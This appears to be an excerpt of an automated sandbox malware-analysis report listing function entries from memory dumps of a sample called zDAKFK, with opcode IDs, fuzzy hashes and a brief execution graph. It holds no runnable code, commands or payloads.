                                                                                                                                                                      Function 04A9FC80 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7da77a6ef2657aa38de7fe1e2ed6207a6bc8a765585d96303330ea7e29a6f260
                                                                                                                                                                      • Instruction ID: 7d6f373ac0672d0b395e81ecf4843036fda029f20f2af383a70fabad6b7d19ea
                                                                                                                                                                      • Opcode Fuzzy Hash: 7da77a6ef2657aa38de7fe1e2ed6207a6bc8a765585d96303330ea7e29a6f260
                                                                                                                                                                      • Instruction Fuzzy Hash: 71F052A0A09BC00FE31283385862BE6BFB29FC2214F0985EFD48AC32A3D4255807C354
                                                                                                                                                                      Function 04A9A148 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                                                                                                                      • Instruction ID: 4243ceffdd30f352615e2fe6667d750750fc4abca0ae9b7f9b7c733986b7bd1f
                                                                                                                                                                      • Opcode Fuzzy Hash: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                                                                                                                      • Instruction Fuzzy Hash: 0601B675D00609DFCB40EFACC54589DBBF4FF49210B1185AAE859EB321E770AA44CF91
                                                                                                                                                                      Function 04A92E72 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bec8bebb9cd47fbc9802886f046617b82b9465fd57e61b8ddc64bfac137b21e2
                                                                                                                                                                      • Instruction ID: 79cdce49da1319a510098a0d73c7dddf51c686ddcecdb16ae97c6588249dd715
                                                                                                                                                                      • Opcode Fuzzy Hash: bec8bebb9cd47fbc9802886f046617b82b9465fd57e61b8ddc64bfac137b21e2
                                                                                                                                                                      • Instruction Fuzzy Hash: E0F058323145418FDB45CB2DC844E957BE9AF8AA2471600FAE145CB372DA21DC02C750
                                                                                                                                                                      Function 04A92610 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: cba7d0df1b6be417135a8723d2575aea8e73957dffa59b1606281a35308358f0
                                                                                                                                                                      • Instruction ID: ebfd8dcc68e978c88d7d3e86b88b85176302ca659bf1081ec5f1f7cc943cce70
                                                                                                                                                                      • Opcode Fuzzy Hash: cba7d0df1b6be417135a8723d2575aea8e73957dffa59b1606281a35308358f0
                                                                                                                                                                      • Instruction Fuzzy Hash: BAF030363002069BCB05BF79D440DAE7BEEEFCA3507144469F9048F225DAB5AC02CBD0
                                                                                                                                                                      Function 04A9FCA8 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 68f7a8592b366290d60c2bacf1e624e2c27ae14313467669b0d42b6b656e3196
                                                                                                                                                                      • Instruction ID: c45ca578d5fbbbd53b7f80834d2e0a6df741ade03519698b9d2412df7afed1a2
                                                                                                                                                                      • Opcode Fuzzy Hash: 68f7a8592b366290d60c2bacf1e624e2c27ae14313467669b0d42b6b656e3196
                                                                                                                                                                      • Instruction Fuzzy Hash: 96E09271B00A244B5B08EB7FA40196AF6DBAFC8710314C47EE50DC7729ED31AD028685
                                                                                                                                                                      Function 04A92E80 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ab9667396a62f5ec7388eac8ad916d32927dae2263cf5ad9d22d4e997f3e3306
                                                                                                                                                                      • Instruction ID: 0592baf694ff8ea9ba9eba9bd84c75f635a1c16db161b8a2c3bb01c6b37b5031
                                                                                                                                                                      • Opcode Fuzzy Hash: ab9667396a62f5ec7388eac8ad916d32927dae2263cf5ad9d22d4e997f3e3306
                                                                                                                                                                      • Instruction Fuzzy Hash: 9AE0E5363604159FCB18DB2ED848D55B7E9EF89A2131640FAF209CB372DA71EC01CB90
                                                                                                                                                                      Function 04A9B770 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 786bb6cdedd0483635dece93e21229515c34eafb6e4d73f2c9c7c1d797c46b8d
                                                                                                                                                                      • Instruction ID: 8c1d46f98f75547a7b988861c1e64c6bcbe4d729a2a362f8fca2de0d510b27cd
                                                                                                                                                                      • Opcode Fuzzy Hash: 786bb6cdedd0483635dece93e21229515c34eafb6e4d73f2c9c7c1d797c46b8d
                                                                                                                                                                      • Instruction Fuzzy Hash: 65E0D830305B405FC729C72CB850AD97BF5AF4A31431943BAE489D7262DA15FC0E8B50
                                                                                                                                                                      Function 04A9ECC0 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8c90503d02f4c289dbaf5663f4d5419a12dfaca02d03ed1a9d00316a79dc0570
                                                                                                                                                                      • Instruction ID: 23c88d6f2e6d4809423768090457d72e82eb0da9f4c46bd642f4f8423c4561a3
                                                                                                                                                                      • Opcode Fuzzy Hash: 8c90503d02f4c289dbaf5663f4d5419a12dfaca02d03ed1a9d00316a79dc0570
                                                                                                                                                                      • Instruction Fuzzy Hash: 20E07D3121C2521FEF47532518201D83FD1DD031D934D01F6C4C9C3063E90AED0342C1
                                                                                                                                                                      Function 04A925B8 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 86d54da1c21092411919aac022883af01f8568bb412e94f097e6f30569dd741f
                                                                                                                                                                      • Instruction ID: 64c4bbdaf299493866a821eb80b981ccfa8ddb6a6c768d7efa627d415a0f4107
                                                                                                                                                                      • Opcode Fuzzy Hash: 86d54da1c21092411919aac022883af01f8568bb412e94f097e6f30569dd741f
                                                                                                                                                                      • Instruction Fuzzy Hash: 73F01571D09248EFCB01DFA8D5985CCBFB5FB09204F0081EAD909E7215EA345F4ACB80
                                                                                                                                                                      Function 04A99626 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4d719e8e5ec21741f694c04163a0e4a27dae12d34bdb4f78e8fe6f9a35f45aae
                                                                                                                                                                      • Instruction ID: 6e91fbeff60e4f568d116afd89e968da8df9bfbc40277183df1e90e10b9a4d5f
                                                                                                                                                                      • Opcode Fuzzy Hash: 4d719e8e5ec21741f694c04163a0e4a27dae12d34bdb4f78e8fe6f9a35f45aae
                                                                                                                                                                      • Instruction Fuzzy Hash: 33E01AB1A5121DFADF50AB91E5187EFBFF4FB89216F20041AD102B1650D7711948CA90
                                                                                                                                                                      Function 04A91C6C Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 31c687beedfc0748ce650973df9aa5e6916889175778bed06f2a7d963c67b60a
                                                                                                                                                                      • Instruction ID: f5ff5d23d1ff099fa65e3c5ac7fb27ea06acf89c92203b76e2fa17d6ed07ce9c
                                                                                                                                                                      • Opcode Fuzzy Hash: 31c687beedfc0748ce650973df9aa5e6916889175778bed06f2a7d963c67b60a
                                                                                                                                                                      • Instruction Fuzzy Hash: BFE0C2303516049FCB18DB1CE88086AF3E9EF897107108FBAF04AC7324DA60FC054694
                                                                                                                                                                      Function 04A9B98A Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f76b72fd31cc6a5646a38d7f8ddb3527c8979895701492556e05f1331af1ae5d
                                                                                                                                                                      • Instruction ID: 758f261f69074e5f8345c5bad2809229135ecbc300fb388c9c7fc8f4e6ca78f1
                                                                                                                                                                      • Opcode Fuzzy Hash: f76b72fd31cc6a5646a38d7f8ddb3527c8979895701492556e05f1331af1ae5d
                                                                                                                                                                      • Instruction Fuzzy Hash: 36E0D8322087C05FC703E26DD45058AEB92EFC621434989BBD185CB62AEA51AD0BC395
                                                                                                                                                                      Function 04A947DC Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 894a0daca40152d40f1f6874394df0aced225fa1853bf1c87a1773c3c3029ce8
                                                                                                                                                                      • Instruction ID: 26607d3b717791a5f8dc7b891338f0aaa6f55d0527368fcb5264f0ba7e715fa8
                                                                                                                                                                      • Opcode Fuzzy Hash: 894a0daca40152d40f1f6874394df0aced225fa1853bf1c87a1773c3c3029ce8
                                                                                                                                                                      • Instruction Fuzzy Hash: 38F0C275A04149CFDF14EFA8E6855ECB7F1EB8D319F2040AAC405B7250CB366E42CBA0
                                                                                                                                                                      Function 04A9ECD0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e0bfc7c2fe61b28439ac2b35f99e307fa20a60d8a951779432ae89cabe7c75d7
                                                                                                                                                                      • Instruction ID: a64c36170885d7555d0943b0c7aa83aa6b83455e76058c851c2cfccbd33bce7f
                                                                                                                                                                      • Opcode Fuzzy Hash: e0bfc7c2fe61b28439ac2b35f99e307fa20a60d8a951779432ae89cabe7c75d7
                                                                                                                                                                      • Instruction Fuzzy Hash: 57D0A7313181244B8F453BB5780816E33CCAFC9676700007EE50EC3260DE229C0042C4
                                                                                                                                                                      Function 04A925C8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 91656dd21f77bf61d60978bf076a6ce2821d6e85bd62130925eed5d6ce054921
                                                                                                                                                                      • Instruction ID: d2cb1f6b5d8a545cbeacd629d6d79f0f34660ed2efd5cb2b676edfb88fa2a9ef
                                                                                                                                                                      • Opcode Fuzzy Hash: 91656dd21f77bf61d60978bf076a6ce2821d6e85bd62130925eed5d6ce054921
                                                                                                                                                                      • Instruction Fuzzy Hash: 89E07575D0510CEFCB40DFA5D5448DDBBB5EB48200F1081AAD805A2204EA346F55DF80
                                                                                                                                                                      Function 04A981D0 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0383ceaeeccb61d090eb9977745e135e0b9abba0cea76520715b6cd6113a998d
                                                                                                                                                                      • Instruction ID: 07bd0f94a6f36238a6a34a1e0b1469cedafdf584bc6d64410bae1e23adf7da44
                                                                                                                                                                      • Opcode Fuzzy Hash: 0383ceaeeccb61d090eb9977745e135e0b9abba0cea76520715b6cd6113a998d
                                                                                                                                                                      • Instruction Fuzzy Hash: 33E0BFB0A05108FFCB00EFE4E54145DBBF5EB45204B108565E805AB355EB366F04EB51
                                                                                                                                                                      Function 04A9EDE0 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 13c5b79c44e26e71edb171c496584d617a64671ca4fc141cc21baa245d76c435
                                                                                                                                                                      • Instruction ID: 6a0f7c2a6739bdfa20282b9bf4365b37f6847066ad8a47e5dd4b88d405d36d0d
                                                                                                                                                                      • Opcode Fuzzy Hash: 13c5b79c44e26e71edb171c496584d617a64671ca4fc141cc21baa245d76c435
                                                                                                                                                                      • Instruction Fuzzy Hash: 65C09B4954D38159FF1355305A503E43F712DC204CB5541F3CCD99D556D514FC0BB622
                                                                                                                                                                      Function 04A99AE0 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f7eae605f239bed84fb94430fbe886dd173dfe56303d2e72527e14209a6ab6e3
                                                                                                                                                                      • Instruction ID: a26793de46b25a075105f2f0f5a1c11fcf21a7221ae4af0ee34b14b3933e8d89
                                                                                                                                                                      • Opcode Fuzzy Hash: f7eae605f239bed84fb94430fbe886dd173dfe56303d2e72527e14209a6ab6e3
                                                                                                                                                                      • Instruction Fuzzy Hash: E5B09B2131513513EA08319D64105FF72CD47C5569F50006B950D877414CC69C4102DE
                                                                                                                                                                      Function 04A9E6EE Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7e72234ba7c3d59a534f5c3b05979ba58a6ec64ad52a9b0549a1d2a69e22d3ee
                                                                                                                                                                      • Instruction ID: a6f1a3d08861299f6af5551f79b2713ad71551fd83364a5a2983f3c23f0a5a4e
                                                                                                                                                                      • Opcode Fuzzy Hash: 7e72234ba7c3d59a534f5c3b05979ba58a6ec64ad52a9b0549a1d2a69e22d3ee
                                                                                                                                                                      • Instruction Fuzzy Hash: 15C00236140509DFCB01CF54D944D9A3BB6FF58711F158495FA498B632C332D861EB50
                                                                                                                                                                      Function 04A9C4BC Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bbf309e1d6fa071ffe99b40bf96b5bbf7bb93575ed9041c4b8a50f4fdd20c42c
                                                                                                                                                                      • Instruction ID: 4ff7d1668d711c5654b5fdb23496889caf79491e19897847ba0c60e1d674d19e
                                                                                                                                                                      • Opcode Fuzzy Hash: bbf309e1d6fa071ffe99b40bf96b5bbf7bb93575ed9041c4b8a50f4fdd20c42c
                                                                                                                                                                      • Instruction Fuzzy Hash: 5CB012163D0012537D00E335098423B50E3F7C1208384CC1110026001C4C18F8041005
                                                                                                                                                                      Function 04A9E3A0 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fad604844d04f9c381ac05abd7b010f8f4aeaff16117bec06682b7aae6f313ac
                                                                                                                                                                      • Instruction ID: f3cb6a23e06cef605c0898f5a4c64aa520ce673665b175b11d4cce239ca5cd96
                                                                                                                                                                      • Opcode Fuzzy Hash: fad604844d04f9c381ac05abd7b010f8f4aeaff16117bec06682b7aae6f313ac
                                                                                                                                                                      • Instruction Fuzzy Hash:

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 04A93780 Relevance: 41.7, Strings: 33, Instructions: 441COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                      • API String ID: 0-2697097662
                                                                                                                                                                      • Opcode ID: 79ca1eeb0916ddb8b06585ea1c4814a44beddb8591f8370a03a410d69ca73616
                                                                                                                                                                      • Instruction ID: e07166c869069a2834308e3d2282f9647fa7bf0c89318b125bffdaec83005c95
                                                                                                                                                                      • Opcode Fuzzy Hash: 79ca1eeb0916ddb8b06585ea1c4814a44beddb8591f8370a03a410d69ca73616
                                                                                                                                                                      • Instruction Fuzzy Hash: CD121B30E512099FCB48EF79E85569DB7B2FB81300F5149ACD009AF266DF306D898F95
                                                                                                                                                                      Function 04A93790 Relevance: 41.7, Strings: 33, Instructions: 434COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                      • API String ID: 0-2697097662
                                                                                                                                                                      • Opcode ID: 871fda2de1c9a3b01f722efd48d076fdb73d72dd64e61eaa1c735b9c12e8155c
                                                                                                                                                                      • Instruction ID: aef978fba24e9b36b183a0bd19c21727ae4a1404cb6b4676d2eeceafdd96e633
                                                                                                                                                                      • Opcode Fuzzy Hash: 871fda2de1c9a3b01f722efd48d076fdb73d72dd64e61eaa1c735b9c12e8155c
                                                                                                                                                                      • Instruction Fuzzy Hash: AC120B30E512099FCB48EF69E85569DB7B2FB81300F5149ACD009AF266DF306D89CF96
                                                                                                                                                                      Function 04A904C8 Relevance: 12.7, Strings: 10, Instructions: 172COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                      • API String ID: 0-518715366
                                                                                                                                                                      • Opcode ID: ebea753c924f6927ef00ad45f01545b54242b906c084c0a9e48687baca297d1e
                                                                                                                                                                      • Instruction ID: 8a7b7a23ce5fa74e0768dead5ac1d40cb133e2424456191ee71d20faab5713ae
                                                                                                                                                                      • Opcode Fuzzy Hash: ebea753c924f6927ef00ad45f01545b54242b906c084c0a9e48687baca297d1e
                                                                                                                                                                      • Instruction Fuzzy Hash: 61712B31E0060A9FCB08EFA9D8546DDF7B2FF85304F618A29D0057F255EB70698ACB81

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:17%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:60%
                                                                                                                                                                      Total number of Nodes:5
                                                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                                                      execution_graph 12378 d9ec85 12382 d9c5a8 12378->12382 12380 d9ec90 LdrInitializeThunk 12381 d9ecbc 12380->12381 12383 d9c5aa 12382->12383 12383->12383

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00D9EC85 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.4132014214.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_d90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                      • Opcode ID: 0365010ee9ec099c22eefb38c9416c854ef56bf742bc93e2e41e72079dee990d
                                                                                                                                                                      • Instruction ID: fca0e655044c6da6e8a02a305c83f20b8a3c362033fbfcb81a37e47474f10ce3
                                                                                                                                                                      • Opcode Fuzzy Hash: 0365010ee9ec099c22eefb38c9416c854ef56bf742bc93e2e41e72079dee990d
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C216B74E10229CFCB64DFA8D984B9DBBB1BF49304F1080A9E409AB365DB70A985CF50
                                                                                                                                                                      Function 00A7D044 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
